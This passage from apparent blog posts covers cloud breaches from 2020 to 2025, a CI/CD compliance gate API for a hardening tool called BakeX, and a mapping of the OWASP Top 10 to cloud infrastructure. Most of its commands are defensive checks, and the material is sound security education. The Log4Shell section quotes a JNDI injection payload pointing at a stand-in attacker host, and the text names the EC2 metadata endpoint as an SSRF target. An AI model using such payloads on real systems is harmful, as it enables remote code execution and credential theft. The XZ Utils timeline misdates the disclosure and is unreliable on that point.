– The vulnerable class wasn’t in the primary JAR — it was in log4j-core, which appeared as an indirect dependency

# Find Java applications that might include log4j (rough scan — requires access to filesystems)
find / -name "log4j*.jar" -o -name "log4j-core*.jar" 2>/dev/null

# In a Kubernetes context — check running container images for log4j
kubectl get pods -A -o json | \
  jq -r '.items[].spec.containers[].image' | \
  sort -u
# Then scan each image: trivy image --severity CRITICAL <image>

The fix was patching — upgrading Log4j to 2.17.0+. The mitigation was log4j2.formatMsgNoLookups=true or removing the JndiLookup class from the classpath. Neither mitigation addressed the root cause of having an outdated component with critical CVE.

September 2022: Uber — MFA Fatigue Meets Hardcoded Credentials

OWASP: A07 (Identification and Authentication Failures), A02 (Cryptographic Failures)

The Uber breach is a clean illustration of attack chaining: one authentication failure enables discovery of a second authentication failure.

Minute-by-minute anatomy:

Attacker purchases Uber contractor credentials on a criminal marketplace (or phishes them directly)
Contractor has MFA enrolled — Duo push notifications
Attacker initiates login repeatedly, triggering Duo push notifications to contractor’s phone
Contractor rejects 3–4 push notifications
Attacker sends WhatsApp message to contractor’s phone: “Hi, this is IT support. We’re having an issue with your account. Please accept the next Duo notification.”
Contractor accepts
Attacker is in

From inside the Uber network, the attacker found a network share accessible to contractors. On that share: a PowerShell script. In that script: hardcoded admin credentials for Thycotic, Uber’s privileged access management (PAM) system.

With Thycotic admin access, the attacker retrieved credentials for: AWS, GCP, GSuite, VMware, Slack, HackerOne. Full internal access.

The two failures:
– A07: Push-notification MFA that can be defeated by social engineering + fatigue
– A02: Admin credentials in a plaintext PowerShell script on a network share

# Detect MFA fatigue attempts in Okta logs (if Okta is the IdP)
# Query: multiple MFA push rejections followed by acceptance within short window
# In Okta System Log API:
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&since=2024-01-01T00:00:00Z" | \
  jq '[.[] | select(.outcome.result == "FAILURE")] | group_by(.actor.id) | map({user: .[0].actor.displayName, failures: length}) | sort_by(.failures) | reverse | .[0:10]'

The structural fix for MFA fatigue is not user training. It is replacing push-notification MFA with phishing-resistant MFA: FIDO2 hardware keys (YubiKey) or passkeys. A hardware key requires physical presence — a WhatsApp message cannot convince a hardware key to authenticate.

January 2023: CircleCI — Session Token Theft and Secret Exfiltration

OWASP: A07 (Authentication Failures), A08 (Software and Data Integrity Failures)

CircleCI disclosed in January 2023 that an attacker had accessed customer data — specifically, environment variables, tokens, and keys stored by customers in CircleCI’s secret storage.

The attack chain:

Malware on a CircleCI engineer’s laptop stole a 2FA-backed SSO session token
The session token was valid and not yet expired — no MFA re-challenge for the session
Attacker used the session token to access CircleCI’s internal systems
From internal systems, attacker accessed the production database containing encrypted customer secrets
The encryption keys were also accessible — attacker obtained both

The attack did not break encryption. It circumvented encryption by accessing the keys through internal systems that the compromised session token could reach.

What customers stored in CircleCI that was exposed:
– AWS IAM access keys and secret keys
– GitHub tokens
– DockerHub credentials
– SSH private keys
– API tokens for third-party services

The scale: CircleCI could not enumerate which customer secrets were accessed — they notified all customers with environment variables stored in the system.

# After a CI/CD platform breach: rotate all credentials that were stored there
# Start with AWS credentials — find and disable exposed access keys

# List all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "$user" \
      --query "AccessKeyMetadata[].{User:'$user',Key:AccessKeyId,Status:Status,Created:CreateDate}" \
      --output table
  done

# Disable a specific access key
aws iam update-access-key \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive \
  --user-name affected-user

The structural lesson: Secrets stored in a CI/CD platform are only as secure as that platform’s internal access controls and the endpoint security of the engineers who access it. The alternative — short-lived credentials via OIDC workload identity — means no long-lived secrets exist to exfiltrate.

October 2023: Okta — Support System Compromise

OWASP: A07 (Identification and Authentication Failures)

Okta is the identity provider for thousands of organizations. An attacker who compromises Okta’s support system gains access to customer identity configurations.

In October 2023, Okta disclosed that an attacker had accessed their customer support case management system using stolen credentials. The attacker used that access to view HTTP Archive (HAR) files that customers had uploaded as part of support tickets. HAR files capture all network traffic in a browser session — including session cookies and authentication tokens.

What the attacker retrieved from HAR files:
– Active session tokens for customer Okta admin accounts
– Enough data to authenticate as Okta admins for affected customers

Confirmed affected customers (that disclosed publicly):
– 1Password (detected and contained quickly)
– Cloudflare
– BeyondTrust

The dwell time: Okta’s later forensic analysis revealed the attacker had access for two weeks before the disclosure.

# Check Okta System Log for suspicious admin activity
# Look for admin authentications from unusual IPs or at unusual times
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.session.start\"+and+actor.type+eq+\"User\"&since=$(date -d '30 days ago' --iso-8601=seconds)" | \
  jq '.[] | {user: .actor.displayName, ip: .client.ipAddress, time: .published, result: .outcome.result}'

The structural implication for organizations using Okta: Tier-0 accounts (Okta administrators) need break-glass procedures and hardware key MFA — not because Okta itself will be compromised, but because a support system compromise at a SaaS provider can expose session context that reaches those accounts.

OWASP: A08 (Software and Data Integrity Failures), A06 (Vulnerable and Outdated Components)

XZ Utils (CVE-2024-3094) is the most sophisticated supply chain attack to date in the open-source ecosystem. The attacker operated under the pseudonym “Jia Tan” and spent approximately two years building trust in the XZ Utils project before inserting a backdoor.

The timeline:

2022 Q4 — Jia Tan begins contributing to XZ Utils with legitimate, high-quality patches
2023 Q1 — Jia Tan increases contribution frequency; original maintainer shows signs of burnout
2023 Q2 — Jia Tan gains commit access to XZ Utils
2024 Q1 — Jia Tan releases XZ Utils 5.6.0 and 5.6.1 with backdoor in release tarball
          (NOT in git repository — only in the distributed tarball)
2024 Q2 — Andres Freund (Microsoft engineer, incidentally) notices SSH is 500ms slower
          on systems with xz 5.6.x; investigates; finds backdoor
          Reported April 1, 2024; CVE assigned April 2, 2024

The backdoor’s target: The backdoor patched sshd via systemd on glibc-based Linux systems. On affected systems, it would have given the attacker remote code execution on SSH servers — specifically, authentication bypass for a specific RSA key pair held by the attacker.

What was 1–2 weeks from shipping broadly:
– Fedora 40 (test release only — caught before stable)
– Debian unstable/testing
– openSUSE Tumbleweed

The detection insight: The backdoor was in the release tarball, not the git repository. git clone and git diff would not have shown it. The only detection was comparing the distributed tarball’s build output against a reproducible build from source — or noticing the anomalous SSH latency.

# Check if your systems have the affected xz version
xz --version
# Vulnerable: 5.6.0 or 5.6.1

# Check on RPM-based systems
rpm -q xz

# Check on Debian/Ubuntu systems
dpkg -l xz-utils

# Check for sshd linked against compromised libzma
ldd $(which sshd) | grep liblzma
# If libzma is present and xz is 5.6.0 or 5.6.1, the system was exposed

The Three Root Causes: A Framework for Your Exercise Backlog

After analyzing these six incidents (and the broader 2020–2025 breach landscape), three root causes account for virtually every major cloud infrastructure compromise:

┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  ROOT CAUSE 1: IDENTITY                                         │
│  Attacker obtains valid credentials — stolen, phished,          │
│  or socially engineered. MFA does not stop it if MFA            │
│  itself can be bypassed (fatigue, SIM swap, token theft).       │
│  Incidents: Uber, Okta, CircleCI (initial vector)               │
│                                                                 │
│  ROOT CAUSE 2: SUPPLY CHAIN                                     │
│  Attacker compromises something you trust: a vendor's           │
│  software, a build pipeline, an open-source dependency.         │
│  The artifact you install is legitimate — and malicious.        │
│  Incidents: SolarWinds, XZ Utils, Log4Shell (component)         │
│                                                                 │
│  ROOT CAUSE 3: MISCONFIGURATION                                  │
│  An access control is wrong. A resource is exposed that         │
│  shouldn't be. An encryption requirement is missing.            │
│  No attacker capability required — just knowledge of the gap.   │
│  Incidents: Capital One (S3 + IAM), public buckets broadly      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Your purple team exercise backlog should cover all three. The remaining episodes in this series address each one:

Identity: EP05 (MFA fatigue), EP10 (cross-account lateral movement)
Supply chain: EP06 (CI/CD secrets), EP09 (SolarWinds to XZ Utils)
Misconfiguration: EP04 (broken access control in AWS), EP07 (SSRF/IMDS), EP08 (container escape)

Run This in Your Own Environment: Breach Scenario Self-Assessment

Before starting the technique-specific episodes, run this self-assessment to identify which breach scenario your environment is most exposed to:

#!/bin/bash
# Purple Team EP03 — Breach Exposure Self-Assessment

echo "=== IDENTITY EXPOSURE ==="
echo "--- Users with console access and no MFA ---"
aws iam generate-credential-report > /dev/null 2>&1 && sleep 3
aws iam get-credential-report --query 'Content' --output text | \
  base64 -d | awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "  NO MFA: " $1}'

echo ""
echo "=== SUPPLY CHAIN EXPOSURE ==="
echo "--- Lambda functions with old runtimes (EOL = higher CVE exposure) ---"
aws lambda list-functions \
  --query 'Functions[?Runtime==`python3.8` || Runtime==`nodejs14.x` || Runtime==`java8`].{Name:FunctionName,Runtime:Runtime}' \
  --output table

echo ""
echo "=== MISCONFIGURATION EXPOSURE ==="
echo "--- S3 buckets without account-level public access block ---"
ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
PAB=$(aws s3control get-public-access-block --account-id "$ACCOUNT" 2>/dev/null)
if [ -z "$PAB" ]; then
  echo "  CRITICAL: Account-level S3 public access block is NOT set"
else
  echo "$PAB" | jq '{BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, RestrictPublicBuckets}'
fi

echo ""
echo "--- EC2 instances with IMDSv1 enabled (SSRF risk) ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,State:State.Name}' \
  --output table

⚠ Common Mistakes When Using Breach History as a Training Resource

Assuming “we’re not SolarWinds” means supply chain doesn’t apply. You don’t have to be a software vendor. Your GitHub Actions workflows pull third-party actions. Your Dockerfiles pull base images. Your Lambda functions install pip packages. Every external artifact is a supply chain dependency.

Treating Log4Shell as “old news.” The vulnerability was disclosed in 2021. Organizations are still finding Log4j in unexpected places in 2024 — embedded in monitoring agents, database drivers, and vendor-supplied applications where the dependency tree was never audited.

Responding to Uber/Okta by mandating security awareness training. The Uber breach happened to an experienced contractor who made one decision under social pressure. The structural fix is hardware MFA that cannot be fatigue-attacked — not a training module that adds friction and gets clicked through.

Not correlating your own logs against breach indicators. Every breach in this episode produced specific, searchable indicators: specific CloudTrail event patterns, specific process behaviors, specific network anomalies. If you have historical logs, you can run indicators of compromise against them to see whether your environment would have surfaced those indicators.

Quick Reference

Breach	Year	OWASP Primary	Root Cause	Structural Fix
SolarWinds	2020	A08	Supply chain — build pipeline compromise	Reproducible builds, build system isolation
Log4Shell	2021	A03, A06	Injection + vulnerable component	Patch + dependency inventory
Uber	2022	A07, A02	Identity — MFA fatigue + hardcoded creds	Hardware MFA + no hardcoded secrets
CircleCI	2023	A07, A08	Identity — session token theft → CI secret theft	OIDC short-lived creds instead of stored secrets
Okta	2023	A07	Identity — support system compromise → token theft	Hardware MFA for tier-0, session token rotation
XZ Utils	2024	A08, A06	Supply chain — social engineering → maintainer trust	Reproducible builds, artifact signing, SLSA

Key Takeaways

Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident is one or more of these
SolarWinds and XZ Utils are the same attack class: compromise the build pipeline and sign the result with a trusted key
Uber demonstrates that MFA does not prevent breach when the MFA mechanism is push-notification — fatigue + social engineering defeats it
CircleCI demonstrates that long-lived secrets stored in a CI/CD platform are only as secure as that platform — OIDC short-lived credentials eliminate the exposure
Log4Shell demonstrates that vulnerable transitive dependencies are invisible without active dependency scanning — “we didn’t use Log4j” was wrong for thousands of organizations
The attack surface does not change: the same three root causes that caused SolarWinds in 2020 caused XZ Utils in 2024
Your purple team exercise backlog should include at least one scenario for each of the three root causes

What’s Next

EP04 starts the technique-specific episodes with broken access control in AWS — the most common OWASP A01 manifestation in cloud infrastructure. The exercise scenario: an S3 bucket with 47 million records, public for six months, with no alert ever firing. We simulate it, detect it, and fix the IAM and S3 configuration so it cannot happen in your account. If you want the full context for AWS IAM privilege escalation paths that broken access control enables, the IAM series EP08 covers that attack chain in detail.

Get EP04 in your inbox when it publishes → subscribe at linuxcent.com

The Pipeline Gate — Hardened Images as a CI/CD Build Constraint

July 27, 2026May 23, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

OS Hardening as Code, Episode 5
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate**

Note: the tool in this series was released as Stratum and renamed to BakeX at
v0.6.0 — same project, same license, same team. Commands below use the current bakex
CLI. If you arrived here looking for stratum or pip install stratumoss, you’re in the
right place: github.com/invicton/bakex.

TL;DR

A CI/CD compliance gate turns an OS hardening grade from a report into a build constraint — unhardened images fail the pipeline before they can be deployed
POST /api/pipeline/scan scores an image against a pass_threshold and a severity_threshold, and returns a passed boolean
The endpoint returns HTTP 200 even when the gate fails. curl -sf will not catch it — you must parse .passed. This is the single most important detail on this page
The gate is two-dimensional: a score floor and a severity ceiling, so one critical finding blocks a release that scores 94
GitHub Actions, GitLab CI, Jenkins, and Tekton integrations are one curl plus one jq
The structural guarantee: an image that doesn’t pass the gate doesn’t reach the deploy job

The Problem: A Grade No One Checks Is Decoration

Pipeline without compliance gate:
  Build → Test → Security scan (results to dashboard) → Deploy

What actually happens:
  Build → Test → Security scan → "C grade, but we need to ship" → Deploy anyway
                                           │
                                           └─ Dashboard shows C grade
                                              Nobody is paged
                                              Deployment succeeds

A CI/CD compliance gate means the pipeline can’t continue if the grade is below threshold.

EP04 showed that automated OpenSCAP compliance gives every image a verified, reproducible grade before deployment. What it assumed is that someone checks the grade before deploying. They don’t — not under deadline pressure, not when the image has been “working fine for months,” not at 2am.

The same problem that made hardening runbooks skippable applies to compliance grades: if checking the grade is a discretionary step, it will be skipped.

A new microservice was deployed from an unhardened base image. The team had built it quickly during a sprint, used a community AMI as the base, and planned to harden it “in the next sprint.”

Three weeks later, a penetration test found it. SSH password authentication enabled. Three unnecessary services running — one of them with a known CVE. The finding: the instance had full inbound access from the VPC and was reachable from a compromised adjacent instance.

The deployment had gone through the normal CI/CD pipeline. Unit tests passed. Integration tests passed. A vulnerability scan ran. The scan produced a report that went to a dashboard. Nobody had a gate set up to fail the build if the image was unhardened.

The hardening work from the “next sprint” plan would have taken four hours. The pentest remediation took a week, plus the time to investigate what had been exposed during the three weeks the instance was running.

The CI/CD pipeline had every check except the one that would have caught the base image problem before the first deployment.

The Pipeline API

The Pipeline API is a single HTTP endpoint that takes an image ID, scans it, and returns a verdict:

curl -s -X POST https://bakex.yourdomain.com/api/pipeline/scan \
  -H "X-API-Key: ${BAKEX_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "image_id": "ami-0a7f3c9e82d1b4c05",
    "provider": "aws",
    "region": "us-east-1",
    "pass_threshold": 75.0,
    "severity_threshold": "high",
    "wait": true
  }'

Authentication takes either X-API-Key or Authorization: Bearer; keys are created at
/settings/api-keys. With wait: true the request blocks until the scan completes — which is what
you want in CI, where a job that returns before the answer exists is worse than a slow one. There’s
a timeout_seconds (default 900) for when it doesn’t.

The response is the same shape whether you passed or failed:

{
  "job_id": "7f3c9e82-4d1b-4c05-a7f3-c9e82d1b4c05",
  "status": "complete",
  "passed": false,
  "grade": "C",
  "score_pct": 72.0,
  "severity_counts": { "critical": 0, "high": 2, "medium": 5, "low": 11 },
  "threshold_violations": ["high"],
  "pass_threshold": 75.0,
  "severity_threshold": "high",
  "image_id": "ami-0c9d5e3f81a2b6e07",
  "sarif_url": ".../api/auditor/scan-image/7f3c9e82.../report?fmt=sarif",
  "html_report_url": ".../api/auditor/scan-image/7f3c9e82.../report"
}

The detail that will silently break your gate

A failed gate still returns HTTP 200. There is no 4xx on failure — the verdict is in the
passed field, not the status code.

That means the pattern everyone reaches for first is wrong:

# WRONG — this never fails. -f only reacts to HTTP >= 400,
# and a failed gate returns 200.
curl -sf -X POST .../api/pipeline/scan -d '...' || exit 1

You have to read the body:

# RIGHT
RESULT=$(curl -s -X POST "${BAKEX_URL}/api/pipeline/scan" \
  -H "X-API-Key: ${BAKEX_TOKEN}" \
  -H "Content-Type: application/json" \
  -d "{\"image_id\": \"${AMI_ID}\", \"pass_threshold\": 75.0, \"severity_threshold\": \"high\"}")

echo "$RESULT" | jq -r '"grade=\(.grade) score=\(.score_pct) passed=\(.passed)"'

if [ "$(echo "$RESULT" | jq -r '.passed')" != "true" ]; then
  echo "Compliance gate failed — violations: $(echo "$RESULT" | jq -c '.threshold_violations')"
  echo "Report: $(echo "$RESULT" | jq -r '.html_report_url')"
  exit 1
fi

A gate that reports failure and exits 0 is worse than no gate, because it produces a green
pipeline and the belief that something was checked.

Two thresholds, not one

passed is the AND of two independent conditions:

passed = (score_pct >= pass_threshold) AND (no findings at or above severity_threshold)

severity_threshold: "high" means any critical or high finding fails the build regardless of
score. An image can score 94 — a comfortable A — and still fail on a single critical finding. That
is the right default: scores average away the thing that gets you breached.

GitHub Actions Integration

# .github/workflows/deploy.yml

jobs:
  build-image:
    runs-on: ubuntu-latest
    outputs:
      ami_id: ${{ steps.build.outputs.ami_id }}
    steps:
      - name: Build hardened AMI
        id: build
        run: |
          AMI_ID=$(bakex build blueprints/ubuntu/22.04/cis-l1-aws.yaml --json \
            | jq -r '.artifact_id')
          echo "ami_id=${AMI_ID}" >> $GITHUB_OUTPUT

  compliance-gate:
    runs-on: ubuntu-latest
    needs: build-image
    steps:
      - name: BakeX compliance gate
        run: |
          RESULT=$(curl -s -X POST ${{ vars.BAKEX_URL }}/api/pipeline/scan \
            -H "X-API-Key: ${{ secrets.BAKEX_TOKEN }}" \
            -H "Content-Type: application/json" \
            -d "{\"image_id\": \"${{ needs.build-image.outputs.ami_id }}\",
                 \"pass_threshold\": 75.0, \"severity_threshold\": \"high\"}")

          echo "$RESULT" | jq -r '"grade=\(.grade) score=\(.score_pct)"'

          # Must check .passed — the endpoint returns 200 on failure
          if [ "$(echo "$RESULT" | jq -r '.passed')" != "true" ]; then
            echo "::error::Compliance gate failed: $(echo "$RESULT" | jq -c '.threshold_violations')"
            exit 1
          fi

      - name: Upload SARIF to code scanning
        if: always()
        run: |
          curl -s -o bakex.sarif "$(echo "$RESULT" | jq -r '.sarif_url')"
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: bakex.sarif

  deploy:
    runs-on: ubuntu-latest
    needs: [build-image, compliance-gate]
    steps:
      - name: Deploy to staging
        run: |
          aws autoscaling update-auto-scaling-group \
            --auto-scaling-group-name my-asg \
            --launch-template "ImageId=${{ needs.build-image.outputs.ami_id }}"

The deploy job only runs if compliance-gate passes. The AMI doesn’t reach the autoscaling group if it doesn’t meet the grade threshold.

GitLab CI Integration

# .gitlab-ci.yml

stages:
  - build
  - compliance
  - deploy

build-image:
  stage: build
  script:
    - |
      AMI_ID=$(bakex build blueprints/ubuntu/22.04/cis-l1-aws.yaml --json \
        | jq -r '.artifact_id')
      echo "AMI_ID=${AMI_ID}" >> build.env
  artifacts:
    reports:
      dotenv: build.env

compliance-gate:
  stage: compliance
  needs: [build-image]
  script:
    - |
      RESULT=$(curl -s -X POST ${BAKEX_URL}/api/pipeline/scan \
        -H "X-API-Key: ${BAKEX_TOKEN}" \
        -H "Content-Type: application/json" \
        -d "{\"image_id\": \"${AMI_ID}\", \"pass_threshold\": 75.0,
             \"severity_threshold\": \"high\"}")
      echo "$RESULT" | jq -r '"grade=\(.grade) score=\(.score_pct) passed=\(.passed)"'
      test "$(echo "$RESULT" | jq -r '.passed')" = "true"

deploy:
  stage: deploy
  needs: [build-image, compliance-gate]
  script:
    - ./deploy.sh ${AMI_ID}

What the Failed Gate Tells You

The value of the CI/CD compliance gate is not just that it blocks bad images — it’s that the failure output tells engineers what to fix.

The response carries three things an engineer can act on immediately:

$ echo "$RESULT" | jq '{grade, score_pct, threshold_violations, severity_counts}'
{
  "grade": "C",
  "score_pct": 72.0,
  "threshold_violations": ["high"],
  "severity_counts": { "critical": 0, "high": 2, "medium": 5, "low": 11 }
}

threshold_violations names the severities that broke the gate — here, two high findings, not the
score. That distinction matters: an engineer who reads “grade C” starts a broad hardening project,
while one who reads “two high findings” goes and fixes two things.

For the rule-level detail, follow sarif_url. Pushing that SARIF into GitHub code scanning (as in
the workflow above) puts each finding on the pull request diff, which is where someone will actually
read it — a link to a dashboard in a CI log is a link nobody clicks.

Thresholds by Environment

Not all environments need the same bar, and both dimensions are per-request — so the environment
distinction lives in your pipeline, not in BakeX config:

# Production — high score floor, nothing high or above
PASS=90.0 ; SEV=high

# Staging — lower floor, still no criticals
PASS=75.0 ; SEV=critical

# Development — score only, severity effectively off
PASS=60.0 ; SEV=low

curl -s -X POST "${BAKEX_URL}/api/pipeline/scan" \
  -H "X-API-Key: ${BAKEX_TOKEN}" -H "Content-Type: application/json" \
  -d "{\"image_id\": \"${AMI_ID}\", \"pass_threshold\": ${PASS}, \"severity_threshold\": \"${SEV}\"}"

Note that severity_threshold gets stricter as it goes down the list: low fails on any finding
at all, critical fails only on criticals. It reads backwards the first time. Development wanting a
permissive gate wants critical, not low.

Production Gotchas

The 200-on-failure behaviour is the whole ballgame. Repeating it because it is the one thing that
turns this page from useful to harmful if missed: check .passed. Never rely on curl -f, and never
rely on the HTTP status.

Scans take minutes, and wait: true blocks. The endpoint provisions an instance from the image
and scans it. With wait: true your CI job blocks for the duration; timeout_seconds defaults to
900. Set your CI step timeout above that, or use wait: false and poll GET /api/pipeline/scan/{job_id}.

Token rotation. The API key should rotate on the same schedule as other service credentials, and
environments should use different keys — a leaked staging key must not be able to satisfy a
production gate.

The gate needs a reachable BakeX server. This is an HTTP API, not a self-contained action: the
runner must reach the BakeX instance, and that instance needs cloud credentials for the provider
whose image it is scanning.

Key Takeaways

A CI/CD compliance gate turns a compliance grade from a dashboard metric into a pipeline constraint — the image doesn’t deploy if it doesn’t pass
POST /api/pipeline/scan is a single HTTP call that any CI/CD system can make — no agent, no plugin, no SDK required
The endpoint returns 200 even when the gate fails. Parse .passed; curl -sf || exit 1 produces a green pipeline and a false sense of security
The verdict is two-dimensional — a score floor AND a severity ceiling — so a single critical finding blocks an image that scores 94
threshold_violations tells an engineer why it failed, which is the difference between “fix two high findings” and “start a hardening project”
Push the sarif_url into GitHub code scanning so findings land on the pull request, not in a CI log

What’s Next

The CI/CD compliance gate closes the final gap: even if an unhardened image gets built, it can’t deploy. EP05 is the bookmark episode — this is the point where OS hardening becomes structurally enforced rather than procedurally expected.

EP06 is the series closer. For five episodes, you’ve been using BakeX as a user. What does it look like to run it yourself — extend it with a custom provider, deploy it in your own infrastructure, or contribute a blueprint back?

BakeX is Apache 2.0. EP06 is the architecture reveal, the deployment guide, and the extension points for everything the series taught.

Next: BakeX — open-source OS hardening platform for multi-cloud infrastructure

Get EP06 in your inbox when it publishes → linuxcent.com/subscribe

OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

May 19, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → EP03: Cloud security breaches 2020–2025

TL;DR

OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.

Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.

A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

aws s3control get-public-access-block --account-id $(aws sts get-caller-identity --query Account --output text)

# Find buckets that override the account-level block
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    if echo "$result" | grep -q '"BlockPublicAcls": false'; then
      echo "PUBLIC ACCESS NOT BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application using Log4j 2.x.

The fix was not “validate user input better.” The fix was patching Log4j and — for SSRF — enforcing IMDSv2 (which requires a PUT request with a session token that a naive SSRF cannot produce).

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container deployed with --privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed — they were never designed in. The kernel doesn’t enforce namespace isolation when a container has CAP_SYS_ADMIN. The attacker doesn’t exploit a vulnerability — they use capabilities the design granted.

# Find pods running as root or with privileged flag
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    select(
      (.spec.containers[].securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) | 
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

